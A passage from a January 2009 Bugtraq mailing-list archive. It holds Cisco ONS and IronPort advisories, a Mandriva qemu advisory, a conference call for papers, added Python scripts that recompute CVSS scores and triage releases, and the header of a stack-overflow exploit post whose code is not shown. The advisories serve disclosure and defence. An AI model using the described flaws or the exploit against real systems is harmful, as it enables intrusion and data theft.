telephone numbers, and instructions and e-mail addresses for use in
various languages.

Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.

This vulnerability was found by reviewing Cisco TAC service requests.

Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Distribution
===========
This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20090114-ons.shtml

In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

  * cust-security-announce@cisco.com
  * first-bulletins@lists.first.org
  * bugtraq@securityfocus.com
  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.

Revision History
===============
+---------------------------------------+
| Revision |                 | Initial  |
| 1.0      | 2009-January-14 | public   |
|          |                 | release  |
+---------------------------------------+

Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at 
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco 
security notices. All Cisco security advisories are available at 
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)

iEYEARECAAYFAkluC5MACgkQ86n/Gc8U/uCIiwCfb0TgaYDql8VEjtERKMaqgHOm
h0oAniEObgEKjHbo+CHnJxfFFKhCr17o
=7xLg
-----END PGP SIGNATURE-----
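
The Cisco ONS advisory above gives CVSS v2.0 base and temporal scores and leaves the environmental score to each customer. The following is an added example, not part of the advisory: it recomputes the published 7.8 and 6.4 from the listed metrics and then applies the environmental equation. The vector string is a transcription of the advisory's metric list, and the two environment profiles are constructed assumptions.

```python
from decimal import Decimal as D, ROUND_HALF_UP

# CVSS v2.0 metric weights, as published in the CVSS v2.0 specification.
_CIA = {"N": "0.0", "P": "0.275", "C": "0.660"}
_REQ = {"L": "0.5", "M": "1.0", "H": "1.51", "ND": "1.0"}
WEIGHTS = {
    "AV": {"L": "0.395", "A": "0.646", "N": "1.0"},
    "AC": {"H": "0.35", "M": "0.61", "L": "0.71"},
    "Au": {"M": "0.45", "S": "0.56", "N": "0.704"},
    "C": _CIA, "I": _CIA, "A": _CIA,
    "E": {"U": "0.85", "POC": "0.9", "F": "0.95", "H": "1.0", "ND": "1.0"},
    "RL": {"OF": "0.87", "TF": "0.90", "W": "0.95", "U": "1.0", "ND": "1.0"},
    "RC": {"UC": "0.90", "UR": "0.95", "C": "1.0", "ND": "1.0"},
    "CDP": {"N": "0", "L": "0.1", "LM": "0.3", "MH": "0.4", "H": "0.5", "ND": "0"},
    "TD": {"N": "0", "L": "0.25", "M": "0.75", "H": "1.0", "ND": "1.0"},
    "CR": _REQ, "IR": _REQ, "AR": _REQ,
}
BASE_METRICS = ("AV", "AC", "Au", "C", "I", "A")

# Transcribed from the advisory: Network / Low / None / None / None / Complete,
# Functional / Official-Fix / Confirmed.
ADVISORY_VECTOR = "AV:N/AC:L/Au:N/C:N/I:N/A:C/E:F/RL:OF/RC:C"

# Constructed environment profiles (assumptions, not from the advisory).
ISOLATED_DCN = "/CDP:ND/TD:L/AR:M"   # few reachable control cards
EXPOSED_CORE = "/CDP:L/TD:H/AR:H"    # most nodes reachable, availability critical


def parse_vector(vector):
    """Parse 'AV:N/AC:L/...' into a dict; optional metrics default to ND."""
    metrics = {k: "ND" for k in WEIGHTS if k not in BASE_METRICS}
    for part in vector.split("/"):
        key, _, value = part.partition(":")
        if key not in WEIGHTS or value not in WEIGHTS[key]:
            raise ValueError(f"unknown CVSS v2 metric {part!r}")
        metrics[key] = value
    missing = [k for k in BASE_METRICS if k not in metrics]
    if missing:
        raise ValueError(f"missing base metrics: {missing}")
    return metrics


def _w(m, key):
    return D(WEIGHTS[key][m[key]])


def _round1(x):
    # CVSS v2 rounds to one decimal; Decimal avoids binary float surprises.
    return x.quantize(D("0.1"), rounding=ROUND_HALF_UP)


def _base(m, impact):
    exploitability = 20 * _w(m, "AV") * _w(m, "AC") * _w(m, "Au")
    f_impact = D("0") if impact == 0 else D("1.176")
    return _round1((D("0.6") * impact + D("0.4") * exploitability - D("1.5")) * f_impact)


def base_score(m):
    impact = D("10.41") * (1 - (1 - _w(m, "C")) * (1 - _w(m, "I")) * (1 - _w(m, "A")))
    return _base(m, impact)


def temporal_score(m, base=None):
    base = base_score(m) if base is None else base
    return _round1(base * _w(m, "E") * _w(m, "RL") * _w(m, "RC"))


def environmental_score(m):
    # Impact is re-weighted by the security requirements and capped at 10.
    adj_impact = min(D("10"), D("10.41") * (1
        - (1 - _w(m, "C") * _w(m, "CR"))
        * (1 - _w(m, "I") * _w(m, "IR"))
        * (1 - _w(m, "A") * _w(m, "AR"))))
    adj_temporal = temporal_score(m, _base(m, adj_impact))
    return _round1((adj_temporal + (10 - adj_temporal) * _w(m, "CDP")) * _w(m, "TD"))


if __name__ == "__main__":
    m = parse_vector(ADVISORY_VECTOR)
    print("base", base_score(m), "temporal", temporal_score(m))
    for name, env in (("isolated DCN", ISOLATED_DCN), ("exposed core", EXPOSED_CORE)):
        print(name, environmental_score(parse_vector(ADVISORY_VECTOR + env)))
```

The gap between the two profiles comes almost entirely from Target Distribution and the Availability Requirement, which is the quantitative form of the advisory's point that an isolated DCN limits exposure.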
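
The "Software Versions and Fixes" table in the Cisco ONS advisory above mixes "prior to X are not vulnerable" notes with first-fixed releases, which is easy to misread during fleet triage. The following is an added example, not Cisco code, that encodes the table as per-train ranges and classifies an inventory; the dotted `x.y.z` release format, the node names and the inventory itself are assumptions made for the example.

```python
import re

# Transcribed from the advisory's table:
# train -> (first vulnerable release, first fixed release in that train
#           or None if the train has no fix, release to move to)
AFFECTED_TRAINS = {
    (7, 0): ((7, 0, 2), (7, 0, 7), "7.0.7"),
    (7, 2): ((7, 2, 2), (7, 2, 3), "7.2.3"),
    (8, 0): ((8, 0, 0), None, "8.5.3"),  # whole train vulnerable, migrate
    (8, 5): ((8, 5, 1), (8, 5, 3), "8.5.3"),
}
UNAFFECTED_TRAINS = {(9, 0)}  # listed as "Not vulnerable."


def classify(release):
    """Return (status, target_release) for one software release string.

    status is 'vulnerable', 'not vulnerable', 'not listed' (train absent
    from the advisory, check with the vendor) or 'unknown' (unparseable).
    """
    m = re.fullmatch(r"\s*(\d+)\.(\d+)\.(\d+)\s*", release)
    if not m:
        # A truncated value such as "8.5" cannot be placed in a range safely.
        return ("unknown", None)
    version = tuple(int(g) for g in m.groups())
    train = version[:2]
    if version < (7, 0, 0) or train in UNAFFECTED_TRAINS:
        return ("not vulnerable", None)  # "Releases prior to 7.0 are not affected"
    if train not in AFFECTED_TRAINS:
        return ("not listed", None)
    first_vulnerable, first_fixed, target = AFFECTED_TRAINS[train]
    if version >= first_vulnerable and (first_fixed is None or version < first_fixed):
        return ("vulnerable", target)
    return ("not vulnerable", None)


def triage(inventory):
    """Return only the nodes that need an upgrade or a manual check."""
    findings = {}
    for node, release in inventory.items():
        status, target = classify(release)
        if status != "not vulnerable":
            findings[node] = (release, status, target)
    return findings


# Constructed inventory for illustration (node names are hypothetical).
SAMPLE_INVENTORY = {
    "ons15454-a": "7.0.1",   # before the first vulnerable 7.0 release
    "ons15454-b": "7.0.5",
    "ons15327-a": "8.0.2",
    "ons15600-a": "8.5.3",   # first fixed 8.5 release
    "ons15310-a": "8.5",     # truncated, cannot be classified
    "ons15310-b": "7.1.0",   # train not mentioned in the advisory
}

if __name__ == "__main__":
    for node, finding in sorted(triage(SAMPLE_INVENTORY).items()):
        print(node, *finding)
```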

From - Wed Jan 14 14:02:17 2009
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:010 ] qemu
Date: Wed, 14 Jan 2009 00:13:01 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LMzvx-0005By-0Z@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:010
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : qemu
 Date    : January 14, 2009
 Affected: 2008.0, 2008.1
 _______________________________________________________________________

 Problem Description:

 A security vulnerability has been discovered and corrected
 in the VNC server of qemu 0.9.1 and earlier, which could lead to a
 denial-of-service attack (CVE-2008-2382).
 
 The updated packages have been patched to prevent this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2382
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 d18f37c8afe834fc75b8d20fd739c35e  2008.0/i586/dkms-kqemu-1.3.0-0.pre11.13.3mdv2008.0.i586.rpm
 90ac7511cb7b1ef350b0edeaddcbb61c  2008.0/i586/qemu-0.9.0-16.3mdv2008.0.i586.rpm
 14fb383247d38fa1625384e8a5c07106  2008.0/i586/qemu-img-0.9.0-16.3mdv2008.0.i586.rpm 
 7a7c649d2c0e033767a8f891491fa11a  2008.0/SRPMS/qemu-0.9.0-16.3mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 a199c71663339ff512fc286287aa393f  2008.0/x86_64/dkms-kqemu-1.3.0-0.pre11.13.3mdv2008.0.x86_64.rpm
 d6ad774c00ab0f8d7583d6903d845bda  2008.0/x86_64/qemu-0.9.0-16.3mdv2008.0.x86_64.rpm
 d7dfcf881def049285be2f22cb430d8b  2008.0/x86_64/qemu-img-0.9.0-16.3mdv2008.0.x86_64.rpm 
 7a7c649d2c0e033767a8f891491fa11a  2008.0/SRPMS/qemu-0.9.0-16.3mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 0b47bf7f27ba348045e167c2e3c69119  2008.1/i586/dkms-kqemu-1.3.0-0.pre11.15.3mdv2008.1.i586.rpm
 66202d0f349f70cf8ac1289bb5e70708  2008.1/i586/qemu-0.9.0-18.3mdv2008.1.i586.rpm
 b2ed2e31823f48695a97f8bbc506e7f6  2008.1/i586/qemu-img-0.9.0-18.3mdv2008.1.i586.rpm 
 5f7d176cfba6e6b262c14de369eb60e1  2008.1/SRPMS/qemu-0.9.0-18.3mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 2111acd253c95c5633f5389dedf7af1d  2008.1/x86_64/dkms-kqemu-1.3.0-0.pre11.15.3mdv2008.1.x86_64.rpm
 dd1b9f85874c290458fa4b7943c233ee  2008.1/x86_64/qemu-0.9.0-18.3mdv2008.1.x86_64.rpm
 e22ca1a87a2a41f8f306da778b15e5f0  2008.1/x86_64/qemu-img-0.9.0-18.3mdv2008.1.x86_64.rpm 
 5f7d176cfba6e6b262c14de369eb60e1  2008.1/SRPMS/qemu-0.9.0-18.3mdv2008.1.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJbWPlmqjQ0CJFipgRAnvHAJoD0Inft9/2qDupdRM8u0nBQs81bgCgo28B
qXNv6NOXGtRSPKGNS0Acc3o=DHda
-----END PGP SIGNATURE-----

From - Wed Jan 14 14:12:17 2009
Date: 14 Jan 2009 08:08:57 -0000
Message-ID: <20090114080857.2258.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: kgconference@gmail.com
To: bugtraq@securityfocus.com
Subject: Call for Papers: Cyber Warfare
Status:   

-----

Call for Papers!

Conference on Cyber Warfare

June 17-19, 2009

Tallinn, Estonia

The Cooperative Cyber Defence Centre of Excellence is hosting a Conference on Cyber Warfare in 2009.  

CCD CoE is soliciting research papers within the emerging field of cyber warfare, including but not limited to the following topics:

#  Concepts and Doctrine
#  Technical Challenges and Solutions
#  Strategic Analysis
#  Cooperative Cyber Defence
#  Lessons Learned
#  Proofs of Concept
#  The Future

The Selection Committee seeks submissions from academia and the professional world that offer an original and substantial contribution toward understanding conflict in cyberspace.

Authors should send a one-page abstract to cfp@ccdcoe.org between January 1 and March 15, 2009.

The Selection Committee will notify all authors of its decisions ASAP following submission but NLT April 1.

Final papers are due May 15, 2009.  They will be presented at the conference by the author and published in the conference proceedings.

Keynote Speakers include:
James Lewis (CSIS) "Securing Cyberspace for the 44th Presidency"
Mikko Hypponen (F-Secure) Chief Research Officer

Conference registration information will be posted by February 1 at www.ccdcoe.org.

Questions regarding this conference may be sent to cwcon@ccdcoe.org from January 1, 2009. 

Conference Manager:

Kenneth Geers, CCD CoE Scientist

-----

From - Wed Jan 14 14:12:18 2009
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: IronPort Encryption Appliance / PostX and PXE Encryption Vulnerabilities
Date: Wednesday, 14 January 2009 11:15:00 -0600 
Message-id: <200901141115.ironport@psirt.cisco.com>
Reply-To: psirt@cisco.com
Errors-To: nobody@cisco.com
MIME-Version: 1.0
Content-Type: Text/Plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Prevent-NonDelivery-Report: 
Content-Return: Prohibited
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: IronPort Encryption Appliance / PostX and
                         PXE Encryption Vulnerabilities

Advisory ID: cisco-sa-20090114-ironport

Revision 1.0

For Public Release 2009 January 14 1600 UTC (GMT)

+---------------------------------------------------------------------

Summary
======
IronPort PXE Encryption is an e-mail encryption solution that is
designed to secure e-mail communications without the need for a
Public Key Infrastructure (PKI) or special agents on receiving
systems. When an e-mail message is targeted for encryption, the PXE
encryption engine on an IronPort e-mail gateway encrypts the original
e-mail message as an HTML file and attaches it to a notification
e-mail message that is sent to the recipient. The per-message key
used to decrypt the HTML file attachment is stored on a local
IronPort Encryption Appliance, PostX software installation or the
Cisco Registered Envelope Service, which is a Cisco-managed software
service.

PXE Encryption Privacy Vulnerabilities
+-------------------------------------

The IronPort PXE Encryption solution is affected by two
vulnerabilities that could allow unauthorized individuals to view the
contents of secure e-mail messages. To exploit the vulnerabilities,
attackers must first intercept secure e-mail messages on the network
or via a compromised e-mail account.

IronPort Encryption Appliance Administration Interface Vulnerabilities
+---------------------------------------------------------------------

IronPort Encryption Appliance devices contain two vulnerabilities
that could allow unauthorized users to gain access to the IronPort
Encryption Appliance administration interface and modify other users'
settings. These vulnerabilities do not affect Cisco Registered
Envelope Service users.

Cisco has released free software updates that address these
vulnerabilities. There are no workarounds for the vulnerabilities
that are described in this advisory.

This advisory is posted at:

http://www.cisco.com/warp/public/707/cisco-sa-20090114-ironport.shtml

Affected Products
================
Vulnerable Products
+------------------

The following IronPort Encryption Appliance/PostX versions are
affected by these vulnerabilities:

  * All PostX 6.2.1 versions prior to 6.2.1.1
  * All PostX 6.2.2 versions prior to 6.2.2.3
  * All IronPort Encryption Appliance/PostX 6.2.4 versions prior to 6.2.4.1.1
  * All IronPort Encryption Appliance/PostX 6.2.5 versions
  * All IronPort Encryption Appliance/PostX 6.2.6 versions
  * All IronPort Encryption Appliance/PostX 6.2.7 versions prior to 6.2.7.7
  * All IronPort Encryption Appliance 6.3 versions prior to 6.3.0.4
  * All IronPort Encryption Appliance 6.5 versions prior to 6.5.0.2

The version of software that is running on an IronPort Encryption
Appliance is located on the About page of the IronPort Encryption
Appliance administration interface.

Note: Customers should contact IronPort support to determine which
software fixes are applicable for their environment. Please consult
the Obtaining Fixed Software section of this advisory for more
information.

Products Confirmed Not Vulnerable
+--------------------------------

IronPort C, M and S-Series appliances are not affected by these
vulnerabilities. Although C-Series appliances can be configured to
use a local IronPort Encryption Appliance for per-message key
retention, the C-Series appliances are not vulnerable. The Cisco
Registered Envelope Service is not vulnerable.

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details
======
Note: IronPort tracks bugs using an internal system that is not
available to customers. The IronPort bug tracking identifiers are
provided for reference only.

PXE Encryption Privacy Vulnerabilities
+-------------------------------------

Individual PXE Encryption users are vulnerable to two message privacy
vulnerabilities that could allow an attacker to gain access to
sensitive information. All the vulnerabilities require an attacker to
first intercept a secure e-mail message as a condition for successful
exploitation. Attackers can obtain secure e-mail messages by
monitoring a network or a compromised user e-mail account.

The IronPort Encryption Appliance contains a logic error that could
allow an attacker to obtain the unique, per-message decryption key
that is used to protect the content of an intercepted secure e-mail
message without user interaction. Using the decryption key, an
attacker could decrypt the contents of the secure e-mail message.
This vulnerability is documented in IronPort bug 8062 and has been
assigned Common Vulnerabilities and Exposures (CVE) identifier
CVE-2009-0053.

By modifying the contents of intercepted secure e-mail messages or by
forging a close copy of the e-mail message, it may be possible for an
attacker to convince a user to view a modified secure e-mail message
and then cause the exposure of the user's credentials and message
content. Please see the Workarounds section for more information on
mitigations available to reduce exposure to these phishing-style
attacks. This vulnerability is documented in IronPort bug 8149 and
has been assigned Common Vulnerabilities and Exposures (CVE)
identifier CVE-2009-0054.

IronPort Encryption Appliance Administration Interface Vulnerabilities
+---------------------------------------------------------------------

The administration interface of IronPort Encryption Appliance devices
contains a cross-site request forgery (CSRF) vulnerability that could
allow an attacker to modify a user's IronPort Encryption Appliance
preferences, including their user name and personal security pass
phrase, if the user is logged into the IronPort Encryption Appliance
administration interface. Exploitation of the vulnerability will not
allow an attacker to change a user's password. This vulnerability is
documented in IronPort bug 5806 and has been assigned Common
Vulnerabilities and Exposures (CVE) identifier CVE-2009-0055.

The administration interface of IronPort Encryption Appliance devices
also contains a cross-site request forgery (CSRF) vulnerability that
could allow an attacker to execute a command and modify a user's
IronPort Encryption Appliance preferences, including their user name
and personal security pass phrase, under certain circumstances when a
user logs out of the IronPort Encryption Appliance administration
interface. Exploitation of the vulnerability will not allow an
attacker to change a user's password. This vulnerability is
documented in IronPort bug 6403 and has been assigned Common
Vulnerabilities and Exposures (CVE) identifier CVE-2009-0056.

Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at:

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:

http://intellishield.cisco.com/security/alertmanager/cvss

PXE Encryption Message Decryption Vulnerability - IronPort Bug 8062

CVSS Base Score - 7.1
    Access Vector - Network
    Access Complexity - Medium
    Authentication - None
    Confidentiality Impact - Complete
    Integrity Impact - None
    Availability Impact - None

CVSS Temporal Score - 5.9
    Exploitability - Functional
    Remediation Level - Official Fix
    Report Confidence - Confirmed

PXE Encryption Phishing Vulnerabilities - IronPort Bug 8149

CVSS Base Score - 6.1
    Access Vector - Network
    Access Complexity - High
    Authentication - None
    Confidentiality Impact - Complete
    Integrity Impact - Partial
    Availability Impact - None

CVSS Temporal Score - 5
    Exploitability - Functional
    Remediation Level - Official Fix
    Report Confidence - Confirmed

IronPort Encryption Appliance CSRF Vulnerability - IronPort Bug 5806

CVSS Base Score - 5.8
    Access Vector - Network
    Access Complexity - Medium
    Authentication - None
    Confidentiality Impact - Partial
    Integrity Impact - Partial
    Availability Impact - None

CVSS Temporal Score - 4.8
    Exploitability - Functional
    Remediation Level - Official Fix
    Report Confidence - Confirmed

IronPort Encryption Appliance Logout Action CSRF Vulnerability - IronPort Bug 6403

CVSS Base Score - 5.8
    Access Vector - Network
    Access Complexity - Medium
    Authentication - None
    Confidentiality Impact - Partial
    Integrity Impact - Partial
    Availability Impact - None

CVSS Temporal Score - 4.8
    Exploitability - Functional
    Remediation Level - Official Fix
    Report Confidence - Confirmed

Impact
=====
PXE Encryption Privacy Vulnerabilities
+-------------------------------------

Successful exploitation of these vulnerabilities could allow an
attacker to obtain user credentials and view the contents of
intercepted secure e-mail messages, which could result in the
disclosure of sensitive information.

IronPort Encryption Appliance Administration Interface Vulnerabilities
+---------------------------------------------------------------------

Successful exploitation of these vulnerabilities could allow an
attacker to access user accounts on an IronPort Encryption Appliance
device, which could result in the modification of user preferences.

Software Versions and Fixes
==========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.

Workarounds
==========
There are no workarounds for the vulnerabilities that are described
in this advisory.

There are mitigations available to help prevent exploitation of the
PXE Encryption phishing-style vulnerability. Phishing attacks can be
greatly reduced if DomainKeys Identified Mail (DKIM) and Sender
Policy Framework (SPF) are implemented on IronPort e-mail gateways to
help ensure message integrity and source origin. Additionally, the
PXE Encryption solution contains an anti-phishing Secure Pass Phrase
feature to ensure that secure notification e-mail messages are valid.
This feature is enabled by recipients when configuring their PXE user
profile. Cisco has released a best practices document that describes
several techniques to mitigate against the phishing-style attacks
that is available at the following link:

http://www.cisco.com/web/about/security/intelligence/bpiron.html

Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. The affected products in this advisory are directly
supported by IronPort, and not via the Cisco TAC organization.
Customers should contact IronPort technical support at the link below
to obtain software fixes. IronPort technical support will assist
customers in determining the correct fixes and installation
procedures. Customers should direct all warranty questions to
IronPort technical support.

Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.

http://www.ironport.com/support/contact_support.html

Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities that are described in this advisory.

J.B. Snyder of Brintech reported a method for obtaining PXE
Encryption user credentials via a phishing-style attack to Cisco.

All other vulnerabilities were discovered by Cisco or reported by
customers.

Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Distribution
===========
This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20090114-ironport.shtml

In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

  * cust-security-announce@cisco.com
  * first-bulletins@lists.first.org
  * bugtraq@securityfocus.com
  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.

Revision History
===============
+---------------------------------------+
| Revision |                 | Initial  |
| 1.0      | 2009-January-14 | public   |
|          |                 | release  |
+---------------------------------------+

Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:

http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html

This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:

http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)

iD8DBQFJbhoo86n/Gc8U/uARAjuxAJ4oLc1JjS7N9728Ueb6JB7Y2LVJtACfaSfA
A6WIz481vajHya3jIlp+/Xc�J6
-----END PGP SIGNATURE-----
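
The base and temporal scores in the advisory's "Vulnerability Scoring Details" section follow from the listed metric values through the CVSS version 2.0 equations. The Python below is an added example, not part of the Cisco advisory: the weights and equations are those of the CVSS v2 specification, the three score blocks are copied from the advisory, and the function names are this example's own.

```python
from decimal import Decimal, ROUND_HALF_UP

# Metric weights from the CVSS version 2.0 specification.
_CIA = {"None": 0.0, "Partial": 0.275, "Complete": 0.660}
WEIGHTS = {
    "Access Vector": {"Local": 0.395, "Adjacent Network": 0.646, "Network": 1.0},
    "Access Complexity": {"High": 0.35, "Medium": 0.61, "Low": 0.71},
    "Authentication": {"Multiple": 0.45, "Single": 0.56, "None": 0.704},
    "Confidentiality Impact": _CIA,
    "Integrity Impact": _CIA,
    "Availability Impact": _CIA,
    "Exploitability": {"Unproven": 0.85, "Proof-of-Concept": 0.90,
                       "Functional": 0.95, "High": 1.0, "Not Defined": 1.0},
    "Remediation Level": {"Official Fix": 0.87, "Temporary Fix": 0.90,
                          "Workaround": 0.95, "Unavailable": 1.0, "Not Defined": 1.0},
    "Report Confidence": {"Unconfirmed": 0.90, "Uncorroborated": 0.95,
                          "Confirmed": 1.0, "Not Defined": 1.0},
}
PUBLISHED = ("CVSS Base Score", "CVSS Temporal Score")

# Score blocks copied from the advisory text (bugs 8062, 8149, 5806).
BUG_8062 = """PXE Encryption Message Decryption Vulnerability - IronPort Bug 8062
CVSS Base Score - 7.1
    Access Vector - Network
    Access Complexity - Medium
    Authentication - None
    Confidentiality Impact - Complete
    Integrity Impact - None
    Availability Impact - None
CVSS Temporal Score - 5.9
    Exploitability - Functional
    Remediation Level - Official Fix
    Report Confidence - Confirmed
"""
BUG_8149 = BUG_8062.replace("7.1", "6.1").replace("5.9", "5") \
    .replace("Complexity - Medium", "Complexity - High") \
    .replace("Integrity Impact - None", "Integrity Impact - Partial")
BUG_5806 = BUG_8062.replace("7.1", "5.8").replace("5.9", "4.8") \
    .replace("Confidentiality Impact - Complete", "Confidentiality Impact - Partial") \
    .replace("Integrity Impact - None", "Integrity Impact - Partial")


def round1(value):
    """Round to one decimal place, half up, as CVSS v2 prescribes."""
    return float(Decimal(str(value)).quantize(Decimal("0.1"), rounding=ROUND_HALF_UP))


def parse_block(text):
    """Turn 'Metric - Value' lines into weights; collect the published scores."""
    metrics, published = {}, {}
    for line in text.splitlines():
        name, sep, value = line.strip().partition(" - ")
        if not sep:
            continue
        name, value = name.strip(), value.strip()
        if name in WEIGHTS:
            if value not in WEIGHTS[name]:
                raise ValueError("unknown value %r for metric %r" % (value, name))
            metrics[name] = WEIGHTS[name][value]
        elif name in PUBLISHED:
            published[name] = float(value)
        # Any other line (for example the block title) is ignored.
    return metrics, published


def base_score(m):
    """CVSS v2 base equation."""
    impact = 10.41 * (1 - (1 - m["Confidentiality Impact"])
                      * (1 - m["Integrity Impact"])
                      * (1 - m["Availability Impact"]))
    exploitability = 20 * m["Access Vector"] * m["Access Complexity"] * m["Authentication"]
    f_impact = 0.0 if impact == 0 else 1.176
    return round1((0.6 * impact + 0.4 * exploitability - 1.5) * f_impact)


def temporal_score(base, m):
    """CVSS v2 temporal equation; a missing temporal metric counts as Not Defined."""
    return round1(base * m.get("Exploitability", 1.0)
                  * m.get("Remediation Level", 1.0)
                  * m.get("Report Confidence", 1.0))


def recompute(text):
    """Recompute both scores for one block and compare with the published values."""
    metrics, published = parse_block(text)
    base = base_score(metrics)
    temporal = temporal_score(base, metrics)
    matches = (published.get("CVSS Base Score") == base
               and published.get("CVSS Temporal Score") == temporal)
    return {"base": base, "temporal": temporal, "matches": matches}


if __name__ == "__main__":
    for label, block in (("8062", BUG_8062), ("8149", BUG_8149), ("5806", BUG_5806)):
        print(label, recompute(block))
```

The temporal score is computed from the already rounded base score, which is why 7.1 with a Functional exploit and an Official Fix gives 5.9.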

From - Wed Jan 14 14:22:18 2009
Date: 14 Jan 2009 17:14:39 -0000
From: crimson.loyd@gmail.com
To: bugtraq@securityfocus.com
Subject: OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit

#  OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit
#  Discovered & exploited bY suN8Hclf
#  crimson.loyd@gmail.com, blacksideofthesun.linuxsecured.net
#  Tested on: Windows XP SP2 Polish Full patched
#  
#  Only 274 bytes for shellcode. Wanna more, exploit SEH !!!
#
#  Thanks to Myo and to everyone who knows what hacking really is 
#  Not for money dude, only for fun !!!

print "====================================================================="
print " OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit"
print " bY suN8Hclf (crimson.loyd@gmail.com)"
print "====================================================================="

